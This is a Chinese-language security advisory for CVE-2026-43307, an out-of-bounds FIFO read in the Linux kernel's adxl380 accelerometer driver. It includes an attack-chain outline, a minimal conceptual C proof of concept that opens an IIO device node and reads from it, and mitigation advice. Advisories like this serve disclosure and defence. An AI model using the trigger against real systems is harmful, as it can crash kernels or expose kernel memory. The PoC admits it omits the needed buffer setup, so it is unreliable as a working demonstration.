CVE-2026-43307 Linux内核adxl380驱动FIFO越界读取漏洞

漏洞信息

漏洞编号

CVE-2026-43307

漏洞类型

越界读取

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的adxl380加速度计驱动程序存在一处高危漏洞。问题出在FIFO数据处理逻辑上，中断处理程序假设FIFO中的数据总量总是扫描元素数量的整数倍。然而，硬件传感器实际上是以单样本方式填充FIFO的。当FIFO中的剩余样本数不足一个完整批次时，驱动程序仍按批次读取，导致读取数量超过FIFO实际缓冲区的数据量。这可能引发越界读取，导致内核崩溃或信息泄露。

技术细节

该漏洞位于Linux内核的`drivers/iio/accel/adxl380.c`驱动文件中。当IIO子系统启用多个通道（如x, y, z轴）时，驱动程序定义了一个扫描元素数量N。在中断服务程序（ISR）中，代码从FIFO状态寄存器获取当前数据量，并尝试读取N的倍数的数据。由于硬件填充数据是逐个进行的，如果中断触发时FIFO中的数据量恰好不是N的倍数，驱动程序的计算逻辑会导致其读取超出FIFO物理边界的内存地址。这属于典型的越界读取漏洞。攻击者利用此漏洞需具备本地低权限，通过触发特定的IIO buffer操作，可导致内核空指针解引用、系统崩溃（DoS），或在特定条件下读取内核敏感内存。

攻击链分析

STEP 1

侦察

攻击者确认目标系统运行包含adxl380驱动的Linux内核版本，且该驱动处于加载状态。

STEP 2

获取访问

攻击者获得目标系统的本地低权限用户访问权限。

STEP 3

执行触发

攻击者运行恶意程序，打开对应的IIO设备节点（如/dev/iio/device0），并配置缓冲区触发数据采集。

STEP 4

漏洞利用

程序通过读取操作触发中断，导致驱动程序读取FIFO数据。由于逻辑缺陷，驱动程序读取超出实际FIFO长度的数据，造成内核内存越界访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-43307
 * Triggering the FIFO read overflow in adxl380 driver.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

#define IIO_DEVICE "/dev/iio:device0"

int main() {
    int fd;
    char buffer[1024];
    printf("[*] Attempting to trigger CVE-2026-43307\n");

    fd = open(IIO_DEVICE, O_RDONLY);
    if (fd < 0) {
        perror("[-] Failed to open IIO device");
        return -1;
    }

    printf("[+] Opened %s. Reading data to trigger interrupt handler...\n", IIO_DEVICE);
    
    // In a real exploit, specific buffer setup would be done here
    // to ensure the FIFO has a non-multiple entry count.
    read(fd, buffer, sizeof(buffer));

    printf("[*] Read operation completed. Check dmesg for kernel instability.\n");
    close(fd);
    return 0;
}

影响范围

Linux Kernel (adxl380 driver prior to commit a40f316085985f916ba1599fc303fdbc6a078e86)

防御指南

临时缓解措施

建议立即更新系统内核以修复此漏洞。若无法立即更新，可暂时卸载adxl380驱动模块或通过文件系统权限限制对IIO设备节点的访问，从而防止本地低权限用户触发该漏洞。